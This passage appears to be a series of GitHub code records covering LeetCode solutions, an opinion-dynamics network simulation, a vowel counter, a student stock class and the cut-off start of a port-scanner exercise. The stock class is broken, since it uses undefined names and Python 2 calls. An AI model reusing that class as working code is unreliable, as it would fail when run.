word:\n if i not in p:\n p[i] = {}\n p = p[i]\n p[\"end\"] = \"end\"\n\n def search(self, word: str) -> bool:\n \"\"\"\n Returns if the word is in the data structure. A word could contain the dot character '.' to represent any one letter.\n \"\"\"\n flag = False\n p = self.root\n for i, w in enumerate(word):\n if w == \".\":\n for j in p:\n flag = self.search(word[:i] + j + word[i + 1:]) or flag\n return flag\n elif w not in p:\n return False\n p = p[w]\n if \"end\" in p:\n return True\n else:\n return False\n","repo_name":"huhudaya/leetcode-","sub_path":"LeetCode/211. 添加与搜索单词 - 数据结构设计.py","file_name":"211. 
添加与搜索单词 - 数据结构设计.py","file_ext":"py","file_size_in_byte":1464,"program_lang":"python","lang":"zh","doc_type":"code","stars":1,"dataset":"github-code","pt":"44"} +{"seq_id":"30280069427","text":"import numpy as np\n#from operator import itemgetter\n#import heapq\nimport random\nimport matplotlib.pyplot as plt\nimport matplotlib.colors as col\n#from networkx.drawing.nx_agraph import graphviz_layout, to_agraph\nfrom copy import deepcopy\nimport seaborn as sns\nfrom statistics import stdev, mean\nimport imageio\nimport networkx as nx\nfrom scipy.stats import truncnorm\nimport os\n#from functools import reduce\nimport time\nimport community\n\ndef get_truncated_normal(mean=0, sd=1, low=0, upp=10):\n return truncnorm(\n (low - mean) / sd, (upp - mean) / sd, loc=mean, scale=sd)\n\n#Constants and Variables\n\nstates = [1, -1] #1 being cooperating, -1 being defecting\ndefectorUtility = -0.20 \npoliticalClimate= 0.20 \nselfWeight = 0.6\nd = 5 #degree\ns = 10\nk=3000 #10^6\ncontinuous = True\nskew = -0.05\nmypalette = [\"blue\",\"red\",\"green\", \"orange\", \"violet\", \"grey\", \"magenta\",\"cyan\", \"yellow\"]\nrandomness = 0.0625\n\nargs = {\"defectorUtility\" : defectorUtility, \n \"politicalClimate\" : politicalClimate, \n \"selfWeight\": selfWeight, \"d\":d, \n \"s\": s, \"k\" : k, \"continuous\" : continuous, \"type\" : \"cl\", \"skew\": skew}\n\ndef simulate(i, newArgs):\n setArgs(newArgs)\n global args\n start = time.time()\n X = get_truncated_normal(0.5, 0.15, 0, 1)\n S = get_truncated_normal(args[\"skew\"], 0.25, -1, 1)\n if(args[\"type\"] == \"cl\"):\n model =ClusteredPowerlawModel(144, args[\"d\"], skew=args[\"skew\"], X=X, S=S)\n elif(args[\"type\"] == \"sf\"):\n model = ScaleFreeModel(144, args[\"d\"], skew=args[\"skew\"], X=X, S=S)\n elif(args[\"type\"] == \"grid\"):\n model = GridModel(12, X=X, S=S)\n elif(args[\"type\"] == \"rand\"):\n model = RandomModel(144, args[\"d\"], skew=args[\"skew\"], X=X, S=S)\n else:\n model = RandomModel(144, args[\"d\"], X=X, 
S=S)\n simtime= time.time()\n #print(f'Time to make model: {simtime-start}s\\n')\n res = model.runSim(k, clusters=True)\n return model\n\n#Helper\ndef setArgs(newArgs):\n global args\n for arg, value in newArgs.items():\n args[arg] = value\n\n\ndef decision(probability):\n return random.random() < probability\n\n\ndef getRandomExpo():\n x = np.random.exponential(scale=0.6667)-1\n if(x>1): return 1\n elif (x< -1): return -1\n return x\n\nclass Agent:\n def __init__(self, state):\n self.state = state\n self.interactionsReceived = 0\n self.interactionsGiven = 0\n \n def consider(self, neighbour, neighboursWeight):\n self.interactionsReceived +=1\n neighbour.addInteractionGiven()\n weight = self.state*selfWeight + politicalClimate + defectorUtility + neighboursWeight*neighbour.state #+ random.uniform(-0.25, 0.25)\n #weight = politicalClimate + defectorUtility + neighboursWeight*neighbour.state #+ random.uniform(-0.25, 0.25)\n #print(\"neighbours weight: \", neighboursWeight, \" neighbours state: \", neighbour.state, \" weight: \", weight)\n if(continuous):\n #self.state = weight\n print(\"x: \", weight)\n p1 = (randomness+weight)*(1/(2*randomness))\n #print(p1)\n if(p1 <0): p1 = 0\n if(p1 > 1): p1=1\n print(\"Self.state: \",self.state, \", neighbour: \", neighbour.state,\", p1: \", p1)\n delta = (1/2)*(-self.state+1)*(p1) - ((1/2)*(self.state+1))*(1-p1)\n print(\"delta: \", delta)\n increment = 2*delta*abs(self.state-neighbour.state)\n print(\"increment: \", increment)\n print(\" \")\n self.state += increment\n #Truncate values \n if(self.state > 1):\n self.state = states[0]\n elif(self.state <-1):\n self.state = states[1] \n else:\n if(weight + random.uniform(-randomness, randomness) > 0):\n self.state = states[0]\n else:\n self.state = states[1] \n\n def addInteractionGiven(self):\n self.interactionsGiven +=1\n \n def groupConsider(self, neighbourList):\n return\n \n def groupConsiderA(self, neighbour, neighboursWeight, neighbourList, continuous=False):\n 
nbNeighbours = len(neighbourList)\n nbCoop = 0\n for n in neighbourList:\n if(n['agent'].state > 0): nbCoop += 1\n p = nbCoop/nbNeighbours\n self.interactionsReceived +=1\n neighbour.addInteractionGiven()\n if(neighbour.state <= 0):\n p=1-p\n \n weight = self.state*selfWeight + politicalClimate + defectorUtility + p*neighboursWeight*neighbour.state #+ random.uniform(-0.25, 0.25)\n \n if(continuous):\n self.state = weight\n if(weight > 1):\n self.state = states[0]\n elif(weight <-1):\n self.state = states[1] \n else:\n if(weight > 0):\n self.state = states[0]\n else:\n self.state = states[1] \n \n def groupConsiderB(self, impact, continuous = False):\n print(\"impact: \", impact, \"state: \", self.state)\n weight = self.state*selfWeight + politicalClimate + defectorUtility + impact #+ random.uniform(-0.25, 0.25)\n if(continuous):\n self.state = weight\n if(weight > 1):\n self.state = states[0]\n elif(weight <-1):\n self.state = states[1] \n else:\n if(weight >= 0):\n self.state = states[0]\n else:\n self.state = states[1] \n print(\"new state: \", self.state, \"\\n\")\n \n \n def setState(self, newState):\n if(newState >= states[1] and newState <= states[0]):\n self.state = newState\n else:\n print(\"Error state outside state range: \", newState)\n \n\nclass Model:\n def __init__(self, X = None, S=None):\n self.graph = nx.Graph()\n self.ratio = []\n self.states = []\n self.statesds = []\n self.defectorDefectingNeighsList = []\n self.cooperatorDefectingNeighsList = []\n self.defectorDefectingNeighsSTDList = []\n self.cooperatorDefectingNeighsSTDList =[]\n self.pos = []\n self.X = X\n self.S = S\n self.clusteravg = []\n self.clusterSD = []\n \n def interact(self):\n nodeIndex = random.randint(0, len(self.graph) - 1)\n node = self.graph.nodes[nodeIndex]['agent']\n neighbours = list(self.graph.adj[nodeIndex].keys())\n if(len(neighbours) == 0):\n return\n \n chosenNeighbourIndex = neighbours[random.randint(0, len(neighbours)-1)]\n chosenNeighbour = 
self.graph.nodes[chosenNeighbourIndex]['agent']\n weight = self.graph[nodeIndex][chosenNeighbourIndex]['weight']\n \n node.consider(chosenNeighbour, weight)\n \n def groupInteract(self):\n nodeIndex = random.randint(0, len(self.graph) - 1)\n node = self.graph.nodes[nodeIndex]['agent']\n \n neighbours = list(self.graph.adj[nodeIndex].keys())\n if(len(neighbours) == 0):\n return\n \n chosenNeighbourIndex = neighbours[random.randint(0, len(neighbours)-1)]\n chosenNeighbour = self.graph.nodes[chosenNeighbourIndex]['agent']\n \n weight = self.graph[nodeIndex][chosenNeighbourIndex]['weight']\n \n neighbourList = [self.graph.nodes[i] for i in neighbours]\n node.groupConsiderA(chosenNeighbour, weight, neighbourList)\n \n def groupInteractB(self):\n nodeIndex = random.randint(0, len(self.graph) - 1)\n node = self.graph.nodes[nodeIndex]['agent']\n print(\"Node: \", nodeIndex)\n neighbours = list(self.graph.adj[nodeIndex].keys())\n print(neighbours)\n if(len(neighbours) == 0):\n return\n \n impact = 0\n for n in neighbours:\n neighbour = self.graph.nodes[n]['agent']\n weight = self.graph[nodeIndex][n]['weight']\n impact += neighbour.state * weight\n \n impact = impact/len(neighbours)\n \n node.groupConsiderB(impact)\n \n def getAvgNumberOfDefectorNeigh(self):\n defectorFriendsList = []\n defectorNeighboursList = []\n for node in self.graph:\n agreeingNeighbours = 0\n neighbours = list(self.graph.adj[node])\n for neighbourIndex in neighbours:\n if self.graph.nodes[neighbourIndex]['agent'].state == self.graph.nodes[node]['agent'].state:\n agreeingNeighbours += 1\n if self.graph.nodes[node]['agent'].state== 1:\n defectorNeighboursList.append(agreeingNeighbours) #defectorNeighboursList.append(agreeingNeighbours/len(neighbours))\n else:\n defectorFriendsList.append(agreeingNeighbours)\n \n defectoravg = mean(defectorFriendsList)\n cooperatoravg =mean(defectorNeighboursList)\n defectorSTD = stdev(defectorFriendsList)\n cooperatorSTD =stdev(defectorNeighboursList)\n 
return(defectoravg, cooperatoravg, defectorSTD, cooperatorSTD)\n \n \n def countCooperatorRatio(self):\n count = 0\n for node in self.graph:\n if self.graph.nodes[node]['agent'].state > 0:\n count+=1\n return count/len(self.graph)\n\n def getAvgState(self):\n states = []\n for node in self.graph:\n states.append(self.graph.nodes[node]['agent'].state)\n statearray = np.array(states)\n avg = statearray.mean(axis=0)\n sd = statearray.std()\n return (avg, sd)\n\n def getFriendshipWeight(self):\n #weigth = random.uniform(0.1, 0.9)\n #global X\n weigth = self.X.rvs(1)\n return weigth[0]\n\n def getInitialState(self):\n global args\n if(args['continuous'] != True):\n state = states[random.randint(0,1)]\n else: \n # #state = random.uniform(-1, 1)s\n global S\n state = self.S.rvs(1)[0]\n #state= getRandomExpo()\n \n return state\n \n def runSim(self, k, groupInteract=False, drawModel = False, countNeighbours = False, gifname=None, clusters=False):\n self.partition = community.best_partition(self.graph)\n #modularity = community.modularity(self.partition, self.graph)\n #print(\"modularity of \", args[\"type\"], \" is \", modularity)\n\n if(drawModel):\n draw_model(self)\n \n filenames = []\n \n if(countNeighbours):\n (defectorDefectingNeighs,\n cooperatorDefectingFriends,\n defectorDefectingNeighsSTD,\n cooperatorDefectingFriendsSTD) = self.getAvgNumberOfDefectorNeigh()\n print(\"Defectors: avg: \", defectorDefectingNeighs, \" std: \", defectorDefectingNeighsSTD)\n print(\"Cooperators: avg: \", cooperatorDefectingFriends, \" std: \", cooperatorDefectingFriendsSTD)\n \n for i in range(k):\n if(groupInteract): self.groupInteractB()\n else:\n self.interact()\n ratio = self.countCooperatorRatio()\n self.ratio.append(ratio)\n (state, sd) = self.getAvgState()\n self.states.append(state)\n self.statesds.append(sd)\n \n #self.politicalClimate += (ratio-0.5)*0.001 #change the political climate depending on the ratio of cooperators\n if(clusters):\n (s, sds, size) = 
findAvgStateInClusters(self, self.partition)\n self.clusterSD.append(sds)\n\n if(countNeighbours):\n (defectorDefectingNeighs,\n cooperatorDefectingNeighs,\n defectorDefectingNeighsSTD,\n cooperatorDefectingNeighsSTD) = self.getAvgNumberOfDefectorNeigh()\n self.defectorDefectingNeighsList.append(defectorDefectingNeighs)\n self.cooperatorDefectingNeighsList.append(cooperatorDefectingNeighs)\n self.defectorDefectingNeighsSTDList.append(defectorDefectingNeighsSTD)\n self.cooperatorDefectingNeighsSTDList.append(cooperatorDefectingNeighsSTD)\n if(gifname != None and (i % 1 == 0)):\n draw_model(self, True, i)\n filenames.append(\"plot\" + str(i) +\".png\")\n \n #if(i % 10 == 0):\n #a = random.randint(0,n)\n #b = random.randint(0,n)\n #while(a==b):\n #b = random.randint(0,n)\n #weight = random.uniform(0.1, 0.9)\n #model.graph.add_edge(a, b, weight = weight)\n if(gifname != None):\n images = []\n for filename in filenames:\n images.append(imageio.imread(filename))\n #0.08167\n imageio.mimsave(\"network\" +gifname+ \".gif\", images, duration=0.08167)\n \n (avgs, sds, sizes) = findAvgStateInClusters(self, self.partition)\n self.clusteravg.append(avgs)\n \n if(countNeighbours):\n drawDefectingNeighbours(self.defectorDefectingNeighsList,\n self.cooperatorDefectingNeighsList,\n self.defectorDefectingNeighsSTDList,\n self.cooperatorDefectingNeighsSTDList, \n gifname)\n \n return self.ratio\n \n def populateModel(self, n, skew = 0):\n for n in range (n):\n agent1 = Agent(self.getInitialState())\n self.graph.nodes[n]['agent'] = agent1\n edges = self.graph.edges() \n for e in edges: \n weight=self.getFriendshipWeight()\n self.graph[e[0]][e[1]]['weight'] = weight\n global args\n if(skew != 0 and not args[\"continuous\"] ): \n num = round(abs(skew)*len(self.graph.nodes))\n indexes = random.sample(range(len(self.graph.nodes)), num)\n for i in indexes:\n self.graph.nodes[i]['agent'].state = states[1]\n #self.pos = nx.kamada_kawai_layout(self.graph)\n self.pos = 
nx.spring_layout(self.graph)\n\nclass GridModel(Model):\n def __init__(self, n, **kwargs):\n super().__init__(**kwargs)\n for i in range(n):\n for j in range (n):\n weight = self.getFriendshipWeight()\n agent1 = Agent(self.getInitialState())\n self.graph.add_node(i*n+j, agent=agent1, pos=(i, j))\n self.pos.append((i, j))\n if(i!=0):\n self.graph.add_edge(i*n+j, (i-1)*n+j, weight = weight)\n if(j!=0):\n self.graph.add_edge(i*n+j, i*n+j-1, weight = weight)\n \n\nclass ScaleFreeModel(Model):\n def __init__(self, n, m, skew= 0, **kwargs):\n super().__init__(**kwargs)\n \n self.graph = nx.barabasi_albert_graph(n, m)\n self.populateModel(n, skew)\n\nclass ClusteredPowerlawModel(Model):\n def __init__(self, n, m, skew = 0, **kwargs):\n super().__init__(**kwargs)\n \n self.graph = nx.powerlaw_cluster_graph(n, m, 0.5)\n self.populateModel(n, skew)\n \nclass RandomModel(Model):\n def __init__(self, n, m, skew= 0, **kwargs):\n #m is avg degree/2\n super().__init__(**kwargs)\n p = 2*m/(n-1)\n \n self.graph =nx.erdos_renyi_graph(n, p)\n self.populateModel(n, skew)\n \nclass KarateModel(Model):\n def __init__(self, **kwargs):\n #m is avg degree/2\n super().__init__(**kwargs)\n \n self.graph =nx.karate_club_graph()\n for n in range (len(self.graph.nodes)):\n agent1 = Agent(self.getInitialState())\n self.graph.nodes[n]['agent'] = agent1\n edges = self.graph.edges() \n for e in edges: \n weight=self.getFriendshipWeight()\n \n self.graph[e[0]][e[1]]['weight'] = weight \n self.pos = nx.spring_layout(self.graph)\n\n\ndef findClusters(model):\n partition = community.best_partition(model.graph)\n return partition\n\n \ndef findAvgStateInClusters(model, part):\n states = [[] for i in range(len(set(part.values())))]\n \n for n, v in part.items():\n states[v].append(model.graph.node[n]['agent'].state)\n clusters = []\n sd = []\n clsize = []\n for c in range(len(states)):\n clusters.append(mean(states[c]))\n clsize.append(len(states[c]))\n if(len(states[c])>1):\n 
sd.append(stdev(states[c]))\n else:\n sd.append(0)\n return (clusters, sd, clsize)\n\ndef findAvgSDinClusters(model, part):\n states = [[] for i in range(len(set(part.values())))]\n for n, v in part.items():\n states[v].append(model.graph.node[n]['agent'].state)\n \n sd = []\n for c in range(len(states)):\n if(len(states[c])>1):\n sd.append(stdev(states[c]))\n else:\n sd.append(0)\n return sd\n\ndef drawClusteredModel(model):\n partition = findClusters(model)\n \n for k, v in partition.items():\n model.graph.node[k][\"louvain-val\"] = v\n degrees = nx.degree(model.graph)\n\n #colors = [mypalette[G.node[node][\"louvain-val\"] %9 ] for node in G.nodes()]\n# edge_col = [mypalette[model.graph.node[node][\"louvain-val\"]+1 % 8 ] for node in model.graph.nodes()]\n edge_col = []\n for node in model.graph.nodes():\n edge_col.append(mypalette[model.graph.node[node][\"louvain-val\"] % 9 ])\n \n plt.subplot(1, 2, 2, title=\"Cluster membership\")\n nx.draw(model.graph, model.pos, node_size=[d[1] * 30 for d in degrees], node_color =edge_col)\n (clusters, sd, clsize) = findAvgStateInClusters(model, part= partition)\n text = [f'x={clusters[c]:5.2f} sd={sd[c]:5.2f} n={clsize[c]}' for c in range(len(clusters))]\n #print(text)\n ax = plt.gca()\n handles = [mpatches.Patch(color=mypalette[c], label=text[c]) for c in range(len(text))]\n ax.legend(handles=handles)\n #plt.title(\"Snapshot of network with states and clusters\")\n draw_model(model)#, outline=edge_col, partition = partition)\n \n \nfrom IPython.display import Image\n\n\n#-------- drawing functions ---------\nimport matplotlib.patches as mpatches\n\ndef draw_model(model, save=False, filenumber = None, outline=None, partition=None):\n \n #plt.figure(figsize=(16,16))\n plt.subplot(1, 2, 1, title=\"State of the nodes\")\n color_map = []\n intensities = []\n #pos = []\n for node in model.graph:\n #pos.append(model.graph.nodes[node]['pos'])\n if model.graph.nodes[node]['agent'].state > 0:\n color_map.append((3/255,164/255,94/255, 
model.graph.nodes[node]['agent'].state))\n intensities.append(model.graph.nodes[node]['agent'].state)\n #color_map.append('#03a45e')\n #else: color_map.append('#f7796d')\n \n else: \n color_map.append((247/255,121/255,109/255, -1*model.graph.nodes[node]['agent'].state ))\n intensities.append(model.graph.nodes[node]['agent'].state)\n degrees = nx.degree(model.graph)\n #plt.subplot(121)\n nx.draw(model.graph, model.pos, node_size=[d[1] * 30 for d in degrees], linewidths=2, node_color =intensities, cmap=plt.cm.RdYlGn, vmin=-1, vmax=1 )\n #plt.colorbar(mcp)\n #plt.show()\n \n if(outline !=None):\n #mypalette = [\"blue\",\"red\",\"green\", \"yellow\", \"orange\", \"violet\", \"grey\", \"magenta\",\"cyan\", \"cyan\", \"cyan\", \"cyan\"]\n ax = plt.gca()\n ax.collections[0].set_edgecolor(outline)\n (clusters, sd, clsize) = findAvgStateInClusters(model, part= partition)\n text = [f'x={clusters[c]:5.2f} sd={sd[c]:5.2f} n={clsize[c]}' for c in range(len(clusters))]\n #print(text)\n handles = [mpatches.Patch(color=mypalette[c], label=text[c]) for c in range(len(text))]\n ax.legend(handles=handles)\n plt.title(\"Snapshot of network with states and clusters\")\n\n\n if(save):\n plt.title(filenumber)\n plt.savefig(\"plot\" + str(filenumber) +\".png\", bbox_inches=\"tight\")\n plt.close('all')\n\ndef radialDist(model, depth, isBefore):\n DefectorValues = [[0 for i in range(depth)] for j in range(len(model.graph))]\n CooperatorValues = [[0 for i in range(depth)] for j in range(len(model.graph))]\n \n for nodeIdx in model.graph:\n neighbours = list(model.graph.adj[nodeIdx])\n isCooperator = model.graph.nodes[nodeIdx]['agent'].state > 0\n parent = [nodeIdx]\n for d in range(depth):\n nextLevelNeighs = set([])\n for n in neighbours:\n nextLevelNeighs.update(list(model.graph.adj[n]))\n if(model.graph.nodes[n]['agent'].state > 0 and isCooperator):\n CooperatorValues[nodeIdx][d] += 1\n elif(model.graph.nodes[n]['agent'].state <= 0 and not isCooperator): \n DefectorValues[nodeIdx][d] += 
1\n CooperatorValues[nodeIdx][d] = CooperatorValues[nodeIdx][d]/len(neighbours)\n DefectorValues[nodeIdx][d] = DefectorValues[nodeIdx][d]/len(neighbours)\n \n #make sure the parent level isn't checked again\n for n in parent:\n nextLevelNeighs.discard(n) \n parent = neighbours\n neighbours = nextLevelNeighs\n \n cooperatorRatio = model.countCooperatorRatio()\n \n cooperatorRes = []\n defectorRes = []\n for col in range(depth):\n coopSumRatios = 0\n defectSumRatios = 0\n for row in range(len(CooperatorValues)):\n coopSumRatios += CooperatorValues[row][col]\n defectSumRatios += DefectorValues[row][col]\n cooperatorRes.append(np.array(coopSumRatios)/(len(model.graph)*cooperatorRatio*cooperatorRatio))\n defectorRes.append(np.array(defectSumRatios)/(len(model.graph)*(1-cooperatorRatio)*(1-cooperatorRatio)))\n\n if isBefore:\n intensity = 0.5\n else:\n intensity = 1\n plt.xlabel(\"Distance from the nodes\")\n plt.ylabel(\"Normalised ratio of agreein neighbours\")\n plt.title(\"Distance distribution function\")\n plt.ylim((0, 2.5))\n plt.plot(range(1, len(cooperatorRes)+1), cooperatorRes, color=((23/255, 104/255, 37/255, intensity))) \n plt.plot(range(1, len(cooperatorRes)+1), defectorRes, color=((109/255, 10/255, 10/255, intensity))) \n\ndef avgRadialDist(models, depth, isBefore):\n DefectorList = []\n CooperatorList = []\n \n for model in models :\n DefectorValues = [[0 for i in range(depth)] for j in range(len(model.graph))]\n CooperatorValues = [[0 for i in range(depth)] for j in range(len(model.graph))]\n\n for nodeIdx in model.graph:\n neighbours = list(model.graph.adj[nodeIdx])\n isCooperator = model.graph.nodes[nodeIdx]['agent'].state > 0\n parent = [nodeIdx]\n for d in range(depth):\n nextLevelNeighs = set([])\n for n in neighbours:\n nextLevelNeighs.update(list(model.graph.adj[n]))\n if(model.graph.nodes[n]['agent'].state > 0 and isCooperator):\n CooperatorValues[nodeIdx][d] += 1\n elif(model.graph.nodes[n]['agent'].state <= 0 and not isCooperator): \n 
DefectorValues[nodeIdx][d] += 1\n if(len(neighbours) == 0):\n break\n CooperatorValues[nodeIdx][d] = CooperatorValues[nodeIdx][d]/len(neighbours)\n DefectorValues[nodeIdx][d] = DefectorValues[nodeIdx][d]/len(neighbours)\n\n #make sure the parent level isn't checked again\n for n in parent:\n nextLevelNeighs.discard(n) \n parent = neighbours\n neighbours = nextLevelNeighs\n\n cooperatorRatio = model.countCooperatorRatio()\n\n cooperatorRes = []\n defectorRes = []\n for col in range(depth):\n coopSumRatios = 0\n defectSumRatios = 0\n for row in range(len(CooperatorValues)):\n coopSumRatios += CooperatorValues[row][col]\n defectSumRatios += DefectorValues[row][col]\n if(cooperatorRatio == 0):\n cooperatorRes.append(1)\n else:\n cooperatorRes.append(np.array(coopSumRatios)/(len(model.graph)*cooperatorRatio*cooperatorRatio))\n if(cooperatorRatio == 1):\n defectorRes.append(1)\n else:\n defectorRes.append(np.array(defectSumRatios)/(len(model.graph)*(1-cooperatorRatio)*(1-cooperatorRatio)))\n DefectorList.append( defectorRes)\n CooperatorList.append( cooperatorRes)\n data = np.array(DefectorList)\n avgDefector = np.average(data, axis=0)\n data = np.array(CooperatorList)\n avgCooperator = np.average(data, axis=0)\n \n if isBefore:\n intensity = 0.5\n else:\n intensity = 1\n plt.xlabel(\"Distance from the nodes\")\n plt.ylabel(\"Normalised ratio of agreein neighbours\")\n plt.title(\"Distance distribution function\")\n plt.ylim((0, 2.5))\n plt.xlim((0.5, 5.5))\n plt.plot(range(1, len(avgDefector)+1), avgCooperator, color=((23/255, 104/255, 37/255, intensity))) \n plt.plot(range(1, len(avgDefector)+1), avgDefector, color=((109/255, 10/255, 10/255, intensity))) \n plt.show()\n\ndef drawAvgState(models, avg =False, pltNr=1, title=\"\", clusterSD = False):\n plt.xlabel(\"timesteps\")\n plt.ylabel(\"Average state\")\n #mypalette = [\"blue\",\"red\",\"green\", \"yellow\", \"orange\", \"violet\", \"grey\", \"grey\",\"grey\"]\n plt.subplot(1, 3, 1, title=\"Avg state + SD\")\n 
if(not avg):\n plt.ylim((-1, 1))\n for i in range(len(models)):\n plt.plot(models[i].states)\n else:\n states = []\n sds = []\n plt.ylim((-1, 1))\n for i in range(len(models)):\n states.append(models[i].states)\n sds.append(models[i].statesds)\n array = np.array(states)\n avg = array.mean(axis=0)\n std = np.array(sds).mean(axis=0)\n plt.plot(avg, color=mypalette[pltNr-1], label=title)\n plt.plot(std, color=col.to_rgba(mypalette[pltNr-1], 0.5))\n #plt.plot(avg+std, color=col.to_rgba(mypalette[pltNr-1], 0.5))\n text = [\"rand cont\", \"cl cont\", \"rand disc\", \"cl disc\"]\n handles = [mpatches.Patch(color=mypalette[c], label=text[c]) for c in range(len(text))]\n plt.legend(handles=handles)\n if(clusterSD):\n avgSds = []\n for mod in models:\n #print(mod.clusterSD)\n array = np.array(mod.clusterSD)\n avgSd = array.mean(axis=1)\n avgSds.append(avgSd)\n array = np.array(avgSds)\n avgAvgSd = array.mean(axis=0)\n plt.plot(avgAvgSd, color=mypalette[pltNr-1], linestyle=\":\")\n\n #plt.subplot(1, 2, 2)\n #plt.ylim((0, 1))\n #plt.plot(std, color=mypalette[pltNr-1])\n\ndef drawCrossSection(models, pltNr = 1):\n values = []\n #mypalette = [\"blue\",\"red\",\"green\", \"yellow\", \"orange\", \"violet\", \"grey\", \"grey\",\"grey\"]\n for model in models:\n values.append(model.states[-1])\n plt.subplot(1, 3, 2, title=\"Density Plot of state for simulations\")\n plt.xlim((0, 2))\n plt.ylim((-1, 1))\n #plt.title('Density Plot of state for simulations')\n #plt.xlabel('avg state of cooperators after all time steps')\n plt.xlabel('Density')\n try:\n sns.distplot(values, hist=False, kde=True, color = mypalette[pltNr-1], vertical=True)\n except:\n sns.distplot(values, hist=True, kde=False, color = mypalette[pltNr-1], vertical=True)\n\n #plt.show()\n\ndef drawClustersizes(models, pltNr = 1):\n #mypalette = [\"blue\",\"red\",\"green\", \"yellow\", \"orange\", \"violet\", \"grey\", \"grey\",\"grey\"]\n sizes = []\n for model in models:\n part = findClusters(model)\n (avg, sd, size) = 
findAvgStateInClusters(model, part)\n for s in size:\n sizes.append(s)\n plt.subplot(1, 3, 3, title=\"Density Plot of clustersize simulations\")\n plt.xlabel(\"Clustersize\")\n sns.distplot(sizes, hist=True, kde=True, color = mypalette[pltNr-1])\n\ndef drawConvergence(variables, modelsList, pltNr = 1):\n #mypalette = [\"blue\",\"red\",\"green\", \"yellow\", \"orange\", \"violet\", \"grey\", \"grey\",\"grey\"]\n\n endState = []\n for models in modelsList:\n values = []\n for model in models:\n values.append(model.states[-1])\n endState.append(mean(values))\n plt.subplot(1,2,2)\n plt.xlim((-1, 1))\n plt.ylim((-1, 1))\n plt.scatter(variables, endState, color=mypalette[pltNr-1])\n\ndef drawClusterState(models, pltNr = 1):\n plt.subplot(1, 3, 3, title=\"Avg state in clusters\")\n states = []\n plt.ylim((-1, 1))\n for i in range(len(models)):\n print(models[i].clusteravg[0])\n for c in models[i].clusteravg[0]:\n states.append(c)\n plt.xlim((0, 2))\n plt.ylim((-1, 1))\n #plt.title('Density Plot of state for simulations')\n #plt.xlabel('avg state of cooperators after all time steps')\n plt.xlabel('Density')\n print(states)\n try:\n sns.distplot(states, hist=True, kde=True, color = mypalette[pltNr-1], vertical=True)\n except:\n sns.distplot(states, hist=True, kde=False, color = mypalette[pltNr-1], vertical=True)","repo_name":"sigridbra/project-collective-altruism","sub_path":"modelsq.py","file_name":"modelsq.py","file_ext":"py","file_size_in_byte":29177,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"44"} +{"seq_id":"70181691332","text":"def solution(s):\n def checker(left, right):\n nonlocal s\n while left < right:\n if s[left] != s[right]:\n return False\n left, right = left+1, right-1\n return True\n answer = 0\n for i in range(len(s)):\n left = i - answer\n while 0 <= left:\n if checker(left, i):\n answer = max(answer, i-left+1)\n left -= 1\n return 
answer\nprint(solution(\"abcdcba\"))\nprint(solution(\"abacde\"))","repo_name":"yusong-offx/study-problems","sub_path":"problem/programmers/lv3/가장긴펠린드롬.py","file_name":"가장긴펠린드롬.py","file_ext":"py","file_size_in_byte":487,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"25706725108","text":"import random as rnd\n\nclass Stock:\n def __init__(self, name, ticker, starting_price, current_price, volatility):\n self.name = name\n self.ticker = ticker\n self.starting_price = starting_price\n self.current_price = current_price\n self.volatility = volatility\n\n\n\n def list_stocks(self):\n return (\"Stock name is \" + self.name + \" and ticker is \" + self.ticker + \" and the price is \" + str(self.starting_price))\n\n s = Stock()\n\n for key, value in s.__dict__.iteritems():\n print(attr, value)\n #def __iter__(self, name, ticker, starting_price, current_price, volatility):\n #stock = Stock(self, name, ticker, starting_price, current_price, volatility)\n #for attr, value in stock.__dict__.items():\n #print(attr, value)\n\n# def create_market():\n# global market\n# numStocks = 5\n#\n# stock1 = Stock(\"American Broadcasting Corp\", \"ABC\", 10, 10, 1)\n# stock2 = Stock(\"Diversified Energy Force\", \"DEF\", 12, 12, 1.2)\n# stock3 = Stock(\"Global Health Inc\", \"GHI\", 14, 14, 1.8)\n# stock4 = Stock(\"Jasmine Kiloton LLC\", \"JKL\", 16, 16, 2.2)\n# stock5 = Stock(\"Minnesota Natural Order\", \"MNO\", 18, 18, 2.4)\n\n\n # for key in dir(stock):\n # if not key.startswith('__'):\n # value = getattr(stock, key)\n\n # if not callable(value):\n # print\n # key, value\n\n\ndef main():\n list_stocks()\n print(dir(Stock))\n print([a for a in dir(Stock) if not 
a.startswith('__')])\n\n\nmain()\n\n","repo_name":"LRBeaver/Stock_Market","sub_path":"class_three.py","file_name":"class_three.py","file_ext":"py","file_size_in_byte":1489,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"1330623076","text":"# Escribir un programa que pida al usuario una palabra\n# y muestre por consola el n° de veces que contiene cada vocal\n\ndef leer_frase():\n global palabra\n palabra = input(\"Ingrese alguna palabra para contar las vocales: \").lower()\n\n\ndef contar_vocales():\n Letra_a = [\"a\", \"á\"]\n cont = 0\n for x in Letra_a:\n for y in palabra:\n if x == y:\n cont += 1\n print(\"El n° de veces que sale la a es de: \", cont)\n\n Letra_e = [\"e\", \"é\"]\n cont = 0\n for x in Letra_e:\n for y in palabra:\n if x == y:\n cont += 1\n print(\"El n° de veces que sale la e es de: \", cont)\n Letra_i = [\"i\", \"í\"]\n cont = 0\n for x in Letra_i:\n for y in palabra:\n if x == y:\n cont += 1\n print(\"El n° de veces que sale la i es de: \", cont)\n Letra_o = [\"o\", \"ó\"]\n cont = 0\n for x in Letra_o:\n for y in palabra:\n if x == y:\n cont += 1\n print(\"El n° de veces que sale la o es de: \", cont)\n Letra_u = [\"u\", \"ú\"]\n cont = 0\n for x in Letra_u:\n for y in palabra:\n if x == y:\n cont += 1\n print(\"El n° de veces que sale la u es de: \", cont)\n\n\n\nleer_frase()\ncontar_vocales()\n","repo_name":"Cris1579/Python-2023","sub_path":"Estructura de datos/Retos Clase/Reto n°3.py","file_name":"Reto n°3.py","file_ext":"py","file_size_in_byte":1260,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"42450944838","text":"#!/usr/bin/env python3\n\n# Script: Ops 401 Challenge 44\n# Author: Jose Cardozo\n# Date of latest revision: 03/16/2023\n# Purpose: Ops Challenge: Create a Port Scanner\n\n\n#!/usr/bin/python3\n\nimport socket\n\nsockmod = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\ntimeout = 
